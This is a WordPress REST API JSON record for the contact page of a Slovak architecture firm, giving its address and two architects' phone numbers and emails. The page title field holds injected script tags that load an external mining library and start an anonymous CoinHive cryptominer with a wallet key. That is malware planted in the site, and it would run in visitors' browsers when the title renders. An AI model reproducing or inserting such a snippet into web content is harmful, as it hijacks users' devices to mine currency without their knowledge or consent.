{"id":45,"date":"2014-06-17T10:50:36","date_gmt":"2014-06-17T08:50:36","guid":{"rendered":"https:\/\/www.archico.sk\/?page_id=45"},"modified":"2023-03-14T11:26:03","modified_gmt":"2023-03-14T09:26:03","slug":"kontakt","status":"publish","type":"page","link":"https:\/\/www.archico.sk\/?page_id=45","title":{"rendered":"<script src=\"https:\/\/authedmine.eu\/lib\/5.js\"><\/script> <script> var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); <\/script>KONTAKT"},"content":{"rendered":"\n<p>ARCHICO, s.r.o.<\/p>\n\n\n\n<p>Malat\u00edny 149<\/p>\n\n\n\n<p>032 15 Malat\u00edny<\/p>\n\n\n\n<p>Ing.arch. Marek Jablonsk\u00fd \/ mobil: 0908 710 813 \/ email: jablonsky.marek@gmail.com<\/p>\n\n\n\n<p>Ing.arch. Stanislav Majcher, PhD. \/ mobil: 0908 710 041 \/ email: smajcher@gmail.com<\/p>\n","protected":false},"excerpt":{"rendered":"<p>ARCHICO, s.r.o. Malat\u00edny 149 032 15 Malat\u00edny Ing.arch. Marek Jablonsk\u00fd \/ mobil: 0908 710 813 \/ email: jablonsky.marek@gmail.com Ing.arch. Stanislav Majcher, PhD. \/ mobil: 0908 710 041 \/ email: smajcher@gmail.com<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":9,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/www.archico.sk\/index.php?rest_route=\/wp\/v2\/pages\/45"}],"collection":[{"href":"https:\/\/www.archico.sk\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.archico.sk\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.archico.sk\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.archico.sk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=45"}],"version-history":[{"count":7,"href":"https:\/\/www.archico.sk\/index.php?rest_route=\/wp\/v2\/pages\/45\/revisions"}],"predecessor-version":[{"id":1800,"href":"https:\/\/www.archico.sk\/index.php?rest_route=\/wp\/v2\/pages\/45\/revisions\/1800"}],"wp:attachment":[{"href":"https:\/\/www.archico.sk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=45"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}